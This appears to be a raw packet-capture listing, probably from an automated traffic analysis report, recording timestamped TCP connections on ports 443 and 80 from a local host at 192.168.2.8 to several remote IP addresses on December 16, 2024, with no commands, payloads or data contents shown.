                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:42.283373117 CET44349713116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:42.478113890 CET4970680192.168.2.82.22.50.144
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:42.598526001 CET80497062.22.50.144192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:42.599081993 CET4970680192.168.2.82.22.50.144
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:42.925645113 CET44349713116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:42.925786972 CET49713443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:42.925829887 CET44349713116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:42.925857067 CET44349713116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:42.926031113 CET49713443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:42.926032066 CET49713443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:42.928380966 CET49713443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:42.928420067 CET44349713116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:42.930803061 CET49714443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:42.930866957 CET44349714116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:42.930948019 CET49714443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:42.931365967 CET49714443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:42.931379080 CET44349714116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:43.993731976 CET4970480192.168.2.8104.18.38.233
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:43.993735075 CET4970580192.168.2.8172.64.149.23
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:43.993735075 CET4970380192.168.2.8104.18.38.233
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:43.993762970 CET4970880192.168.2.8104.18.38.233
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:43.993773937 CET4970780192.168.2.82.22.50.144
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:44.114265919 CET8049704104.18.38.233192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:44.114362001 CET4970480192.168.2.8104.18.38.233
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:44.115050077 CET8049705172.64.149.23192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:44.115072966 CET8049703104.18.38.233192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:44.115092039 CET80497072.22.50.144192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:44.115104914 CET4970580192.168.2.8172.64.149.23
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:44.115114927 CET8049708104.18.38.233192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:44.115138054 CET4970380192.168.2.8104.18.38.233
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:44.115169048 CET4970780192.168.2.82.22.50.144
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:44.115171909 CET4970880192.168.2.8104.18.38.233
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:44.338835955 CET44349714116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:44.339006901 CET49714443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:44.339581966 CET49714443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:44.339591026 CET44349714116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:44.341454029 CET49714443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:44.341459036 CET44349714116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:45.271004915 CET44349714116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:45.271197081 CET44349714116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:45.271301985 CET49714443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:45.271615028 CET49714443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:45.271636963 CET44349714116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:45.272711039 CET49715443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:45.272811890 CET44349715116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:45.274100065 CET49715443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:45.274342060 CET49715443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:45.274365902 CET44349715116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:46.678150892 CET44349715116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:46.678231955 CET49715443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:46.710436106 CET49715443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:46.710478067 CET44349715116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:46.712606907 CET49715443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:46.712614059 CET44349715116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:47.571971893 CET44349715116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:47.571999073 CET44349715116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:47.572066069 CET44349715116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:47.572130919 CET49715443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:47.572160006 CET49715443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:47.572662115 CET49715443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:47.572685957 CET44349715116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:47.574073076 CET49716443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:47.574116945 CET44349716116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:47.574208021 CET49716443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:47.574417114 CET49716443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:47.574429989 CET44349716116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:48.977421999 CET44349716116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:48.977498055 CET49716443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.066750050 CET49716443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.066783905 CET44349716116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.068391085 CET49716443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.068396091 CET44349716116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.869554043 CET44349716116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.869585037 CET44349716116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.869642019 CET44349716116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.869640112 CET49716443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.869669914 CET49716443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.869719028 CET49716443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.870218992 CET49716443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.870239019 CET44349716116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.871972084 CET49718443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.871999025 CET44349718116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.872062922 CET49718443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.872282028 CET49718443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.872292042 CET44349718116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:51.271939993 CET44349718116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:51.272094965 CET49718443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:51.272665977 CET49718443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:51.272676945 CET44349718116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:51.274333954 CET49718443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:51.274338961 CET44349718116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:52.157284975 CET44349718116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:52.157371044 CET44349718116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:52.157402992 CET49718443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:52.157438040 CET49718443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:52.157723904 CET49718443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:52.157747984 CET44349718116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:52.176980972 CET49719443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:52.177035093 CET44349719116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:52.177110910 CET49719443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:52.177350998 CET49719443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:52.177365065 CET44349719116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:53.172796965 CET49720443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:53.172849894 CET44349720116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:53.172944069 CET49720443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:53.173217058 CET49720443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:53.173229933 CET44349720116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:53.579058886 CET44349719116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:53.580113888 CET49719443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:53.580518961 CET49719443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:53.580527067 CET44349719116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:53.582319975 CET49719443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:53.582324982 CET44349719116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:53.582406044 CET49719443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:53.582422018 CET44349719116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:54.563148022 CET44349719116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:54.563231945 CET44349719116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:54.563287973 CET49719443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:54.563330889 CET49719443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:54.567503929 CET49719443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:54.567524910 CET44349719116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:54.582560062 CET44349720116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:54.582665920 CET49720443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:54.583074093 CET49720443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:54.583086014 CET44349720116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:54.584793091 CET49720443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:54.584803104 CET44349720116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.571279049 CET44349720116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.571346045 CET49720443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.571368933 CET44349720116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.571386099 CET44349720116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.571405888 CET49720443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.571429014 CET49720443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.618233919 CET49720443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.618267059 CET44349720116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.924289942 CET49724443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.924314976 CET44349724142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.924634933 CET49724443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.925352097 CET49724443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.925362110 CET44349724142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:56.483459949 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:56.483504057 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:56.483571053 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:56.483795881 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:56.483807087 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:56.552582026 CET49728443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:56.552625895 CET44349728142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:56.552791119 CET49728443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:56.553148985 CET49728443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:56.553163052 CET44349728142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:56.679764986 CET49729443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:56.679817915 CET44349729142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:56.680000067 CET49729443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:56.680396080 CET49729443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:56.680421114 CET44349729142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:57.621320963 CET44349724142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:57.621860027 CET49724443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:57.621879101 CET44349724142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:57.622983932 CET44349724142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:57.623128891 CET49724443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:57.624157906 CET49724443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:57.624243975 CET49724443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:57.624253988 CET44349724142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:57.671335936 CET44349724142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:57.672588110 CET49724443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:57.672605991 CET44349724142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:57.719526052 CET49724443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.178159952 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.178423882 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.178453922 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.179522038 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.179584980 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.179941893 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.180015087 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.180300951 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.180310011 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.235203981 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.247036934 CET44349728142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.247376919 CET49728443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.247406960 CET44349728142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.250380993 CET44349728142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.250463009 CET49728443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.250946045 CET49728443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.251095057 CET44349728142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.251194000 CET49728443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.251207113 CET44349728142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.297657967 CET49728443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.374331951 CET44349729142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.374593973 CET49729443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.374608994 CET44349729142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.375689983 CET44349729142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.375921011 CET49729443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.376506090 CET49729443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.376569986 CET44349729142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.422800064 CET49729443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.422821045 CET44349729142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.469448090 CET49729443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.472321033 CET44349724142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.472372055 CET44349724142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.472470045 CET49724443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.472477913 CET44349724142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.475956917 CET44349724142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.477945089 CET49724443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.477952957 CET44349724142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.486033916 CET44349724142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.486778975 CET49724443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.486788988 CET44349724142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.487330914 CET49724443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.487361908 CET44349724142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.487528086 CET44349724142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.487610102 CET49724443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.487610102 CET49724443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.066478968 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.066533089 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.066564083 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.066591978 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.066601038 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.066626072 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.066642046 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.066646099 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.066688061 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.073937893 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.094836950 CET44349728142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.094970942 CET44349728142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.095074892 CET49728443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.116720915 CET49728443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.116729021 CET44349728142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.120906115 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.156306982 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.162863016 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.162931919 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.162957907 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.186175108 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.186244011 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.186259985 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.235455036 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.235481977 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.257479906 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.257538080 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.257564068 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.268147945 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.268213034 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.268223047 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.277772903 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.277898073 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.277919054 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.290617943 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.290736914 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.290759087 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.304131985 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.304213047 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.304238081 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.317938089 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.318001986 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.318012953 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.352158070 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.352235079 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.352246046 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.352262020 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.352313995 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.360563993 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.363250017 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.363333941 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.363352060 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.373023033 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.373086929 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.373095989 CET44349727142.250.181.68192.168.2.8
